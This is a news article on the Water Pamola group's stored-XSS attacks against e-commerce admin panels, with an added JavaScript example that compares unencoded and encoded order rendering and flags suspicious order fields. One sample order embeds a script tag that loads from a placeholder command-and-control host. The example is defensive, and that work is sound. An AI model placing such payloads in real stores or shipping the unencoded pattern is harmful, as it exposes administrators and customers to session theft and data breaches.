Website vulnerabilities abused in new hacking campaign
An established organized crime group has switched tactics by launching attacks on e-commerce stores that leverage cross-site scripting (XSS) exploits instead of traditional phishing lures.
The group, dubbed ‘Water Pamola’ by Trend Micro, has been busy attacking e-commerce shops in Japan, Australia, and European countries using spam emails with malicious attachments for the last two years.
In the new campaign, the malicious code is placed in an online order, in the field where the customer’s address or company name would normally be located.
The rogue script is likely activated by exploiting an XSS vulnerability in a targeted store’s administration portal, according to Trend Micro.
“The malicious behavior performed by the scripts includes page grabbing, credential phishing, web shell infection, and malware delivery,” the infosec firm explains in a blog post on the ongoing campaign.
Data breach linked to Water Pamola
In at least one case, administrators of a website that fell victim to Water Pamola later disclosed that they had suffered a data breach.
Their server was illegally accessed and personal information, which included names, credit card numbers, card expiration dates, and credit card security codes, was potentially leaked.
This points to a Magecart-style attack with the twist that cybercriminals are not after a specific e-commerce framework, but e-commerce systems in general.
“If the store’s e-commerce system is vulnerable to XSS attacks, the malicious script will be loaded and executed on the merchant’s management panel once someone (like a system administrator or store employee) opens the [malicious] order,” Trend Micro concludes.
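The mechanism Trend Micro describes is a stored XSS: a customer-supplied order field is written into the merchant’s management page without encoding, so whatever markup the order contains runs in the administrator’s browser. The following example is added here for illustration and is not code from the article, from Trend Micro, or from any e-commerce framework; the order records, field names and rendering functions are all constructed. It shows the vulnerable rendering pattern beside an output-encoded one, plus a simple check that flags order records carrying markup in free-text fields, which is a useful detection signal for a store operator.

```javascript
// Added example (not from the article or Trend Micro): how a stored XSS
// payload placed in an order's address field reaches an admin panel, and
// how output encoding plus a simple field check defend against it.
// All order records below are constructed sample data.

// Minimal HTML entity encoder for text placed inside element content.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Vulnerable pattern: order fields are concatenated straight into markup,
// so anything the customer typed becomes part of the admin page's DOM.
function renderOrderRowVulnerable(order) {
  return `<tr><td>${order.id}</td><td>${order.company}</td><td>${order.address}</td></tr>`;
}

// Hardened pattern: every customer-controlled field is encoded before it
// is placed into element content, so markup in the field renders as text.
function renderOrderRowSafe(order) {
  return `<tr><td>${escapeHtml(order.id)}</td>` +
    `<td>${escapeHtml(order.company)}</td>` +
    `<td>${escapeHtml(order.address)}</td></tr>`;
}

// Detection: flag order records whose free-text fields contain HTML tags,
// inline event handlers or javascript: URLs. Addresses and company names
// should never contain these, so any hit is worth an analyst's look.
const SUSPICIOUS_MARKUP = /<\s*\/?\s*[a-z][^>]*>|\bon[a-z]+\s*=|javascript:/i;

function findSuspiciousOrders(orders) {
  const fields = ["company", "address"];
  return orders.filter(o =>
    fields.some(f => SUSPICIOUS_MARKUP.test(String(o[f] ?? ""))));
}

// Constructed sample orders: one benign, one carrying markup in the
// address field (the URL is a placeholder on the reserved .invalid TLD).
const SAMPLE_ORDERS = [
  { id: 1001, company: "Example Trading Co.", address: "1-2-3 Sample Street, Tokyo" },
  { id: 1002, company: "Acme", address: '<script src="https://c2.example.invalid/x.js"></script>' },
];

// Run directly to compare the two renderings and the detection result.
function main() {
  for (const order of SAMPLE_ORDERS) {
    console.log("vulnerable:", renderOrderRowVulnerable(order));
    console.log("safe:      ", renderOrderRowSafe(order));
  }
  console.log("flagged order ids:", findSuspiciousOrders(SAMPLE_ORDERS).map(o => o.id));
}

if (typeof require !== "undefined" && require.main === module) {
  main();
}
```

The encoded row is the fix the article implies: the store keeps accepting whatever the customer typed, but the management panel shows it as inert text. The detection function is deliberately coarse; in practice it would run over newly placed orders and feed an alert rather than block, since a false positive only costs an analyst a glance while a missed hit hands the attacker an administrator’s session.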
The attack scripts were managed with an XSS attack framework called ‘XSS.ME’, which the cybercriminals have further developed and customized to go beyond its out-of-the-box ability to steal location data and browser cookies.
The source code of this framework is shared across many Chinese public forums, according to Trend Micro.
The same attackers are also using a secondary line of attack that relies on social engineering to phish credentials or trick recipients into downloading malware under the guise of an Adobe Flash update.
There are several Magecart attacker groups. They usually embed a skimmer into e-commerce webpages (by exploiting a vulnerability, gaining access to a victim’s network, compromising third-party libraries, etc.).
Whenever data is entered into a form, the skimmer sends a copy of the data to a command-and-control server.
In short, Magecart-style attacks target website visitors, whereas Water Pamola targets website administrators, Trend Micro's Jaromir Horejsi told The Daily Swig.
“The attacker discovered [an] XSS vulnerability in [the EC-CUBE] framework, which is popular in Japan, thus Japanese sites are targeted,” Horejsi explained. “We can only speculate why they target websites built with [a] framework popular in Japan in the first place.
“Although the number of targeted e-commerce shops is not high, we need to remember that each online shop can have many customers,” the researcher concluded.